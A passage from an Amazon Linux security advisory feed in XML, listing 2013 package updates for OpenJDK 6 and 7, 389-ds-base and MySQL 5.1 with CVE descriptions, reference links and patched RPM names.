epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.25.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.25.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-10.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-183</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-183: critical priority package update for java-1.7.0-openjdk</title><issued date="2013-04-18 13:59:00" /><updated date="2014-09-15 22:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2436:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2431:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2430:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2429:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2426:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-2424:
The MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes.
CVE-2013-2423:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2422:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2421:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2420:
The 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption.
CVE-2013-2419:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2417:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2415:
It was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS.
CVE-2013-2384:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2383:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1569:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1558:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1557:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1537:
The previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code.
CVE-2013-1518:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1488:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-0401:
The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401" title="" id="CVE-2013-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488" title="" id="CVE-2013-1488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518" title="" id="CVE-2013-1518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537" title="" id="CVE-2013-1537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557" title="" id="CVE-2013-1557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1558" title="" id="CVE-2013-1558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569" title="" id="CVE-2013-1569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383" title="" id="CVE-2013-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384" title="" id="CVE-2013-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415" title="" id="CVE-2013-2415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417" title="" id="CVE-2013-2417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419" title="" id="CVE-2013-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420" title="" id="CVE-2013-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421" title="" id="CVE-2013-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422" title="" id="CVE-2013-2422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423" title="" id="CVE-2013-2423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424" title="" id="CVE-2013-2424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426" title="" id="CVE-2013-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429" title="" id="CVE-2013-2429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430" title="" id="CVE-2013-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431" title="" id="CVE-2013-2431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2436" title="" id="CVE-2013-2436" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0751.html" title="" id="RHSA-2013:0751" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.19-2.3.9.1.25.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-184</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-184: low priority package update for 389-ds-base</title><issued date="2013-04-18 15:39:00" /><updated date="2014-09-15 22:52:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1897:
The 389 Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. It was found that the 389 Directory Server did not properly restrict access to entries when the "nsslapd-allow-anonymous-access" configuration setting was set to "rootdse". An anonymous user could connect to the LDAP database and, if the search scope is set to BASE, obtain access to information outside of the rootDSE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1897" title="" id="CVE-2013-1897" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0742.html" title="" id="RHSA-2013:0742" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.0.6-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-185</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-185: important priority package update for java-1.6.0-openjdk</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2431:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2430:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2429:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2426:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-2424:
The MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes.
CVE-2013-2422:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2421:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2420:
The 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption.
CVE-2013-2419:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2417:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2415:
It was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS.
CVE-2013-2384:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2383:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1569:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1558:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1557:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1537:
The previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code.
CVE-2013-1518:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1488:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-0401:
The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401" title="" id="CVE-2013-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488" title="" id="CVE-2013-1488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518" title="" id="CVE-2013-1518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537" title="" id="CVE-2013-1537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557" title="" id="CVE-2013-1557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1558" title="" id="CVE-2013-1558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569" title="" id="CVE-2013-1569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383" title="" id="CVE-2013-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384" title="" id="CVE-2013-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415" title="" id="CVE-2013-2415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417" title="" id="CVE-2013-2417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419" title="" id="CVE-2013-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420" title="" id="CVE-2013-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421" title="" id="CVE-2013-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422" title="" id="CVE-2013-2422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424" title="" id="CVE-2013-2424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426" title="" id="CVE-2013-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429" title="" id="CVE-2013-2429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430" title="" id="CVE-2013-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431" title="" id="CVE-2013-2431" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0770.html" title="" id="RHSA-2013:0770" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-186</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-186: important priority package update for mysql51</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2392:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2391:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2389:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2378:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2375:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1555:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1552:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1548:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1544:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1532:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1531:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1521:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1506:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2012-5614:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5614" title="" id="CVE-2012-5614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1506" title="" id="CVE-2013-1506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1521" title="" id="CVE-2013-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1531" title="" id="CVE-2013-1531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1532" title="" id="CVE-2013-1532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1544" title="" id="CVE-2013-1544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1548" title="" id="CVE-2013-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1552" title="" id="CVE-2013-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1555" title="" id="CVE-2013-1555" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2375" title="" id="CVE-2013-2375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2378" title="" id="CVE-2013-2378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2389" title="" id="CVE-2013-2389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2391" title="" id="CVE-2013-2391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2392" title="" id="CVE-2013-2392" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0772.html" title="" id="RHSA-2013:0772" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-test" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.69" release="1.63.amzn1" epoch="0" 